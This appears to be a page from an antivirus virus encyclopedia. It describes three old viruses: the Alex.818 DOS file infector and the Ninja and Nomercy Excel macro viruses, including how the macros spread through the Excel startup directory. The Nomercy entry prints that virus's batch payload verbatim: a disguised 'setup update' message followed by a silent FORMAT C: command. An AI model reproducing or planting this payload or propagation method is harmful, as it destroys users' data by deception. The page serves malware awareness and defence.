Virus Database

Alex.818

Description Alex.818

This is a nonresident harmless virus. It infects EXE files in a standard way. The virus contains the text strings:
The Kite Virus (C) Alex Hacker *.EXE
The virus is not memory resident but copies small resident programs into the interrupt vector table. The first program erases text from screen by nice method some times after installation. The second program writes byte FEh to port 60h (?).

Check other viruses! Be aware! Use Antiviral Software

Macro.Excel.Ninja

Description Macro.Excel.Ninja

This virus infects Excel spread sheets (XLS files). It contains one module, "Ninja," that has two functions: "auto_open" and "Infect_Ninja".
The virus "auto_open" macro contains just one command that defines the "Infect_Ninja" macro as a handler of the OnSheetActivate routine. As a result, the virus hooks sheets activation, and, while opening a sheet, the virus (the Infect_Ninja macro) takes control.
When the Infect_Ninja macro takes control, it searches for NINJA.XLS files in the Excel Startup directory and checks the count of modules in the current Workbook.
If the infected macro is an active Workbook and the NINJA.XLS file does not exist in the Excel Startup directory, the virus decides that it is being executed for the first time. The virus then creates the NINJA.XLS file in the Excel Startup directory and saves its code to it by using the "Save As" command.
When Excel loads its modules the next time, it automatically loads all XLS files from the Startup directory. The infected NINJA.XLS is loaded as well as other files, and the virus takes control and hooks the sheet activation routine.
If the NINJA.XLS file exists in the Excel directory, the virus copies its code to the active Workbook. As a result, the active Workbook is infected.

Macro.Excel.Nomercy

Description Macro.Excel.Nomercy

This macro-virus infects Excel worksheets (XLS-files). It contains two modules: Members and NoMercy2.
To infect Excel, the virus creates an infected NOMERCY.XLM file in the Excel startup directory (XLStart). The virus contains auto-macro auto_open in its NoMercy2 module, and the auto-macro sets the Fuck macro (infection routine) on OnSheetActivate call. As a result, the virus infects sheets that are activated. The virus detects already infected files by the "NoMercy2" module name.
The virus erases all menu items which work with macros. On Monday after 7 a.m., the virus appends to the C:AUTOEXEC.BAT file a command that formats the hard disk:
@ECHO OFF
CLS
ECHO Please wait while setup Updates Your configuration Files
ECHO This may take a few minutesall
FORMAT C: /U /C /S /AUTOTEST > NUL
ECHO Complete !!!
ECHO.
ECHO.
ECHO Result :
ECHO All Data Lost!!!

Home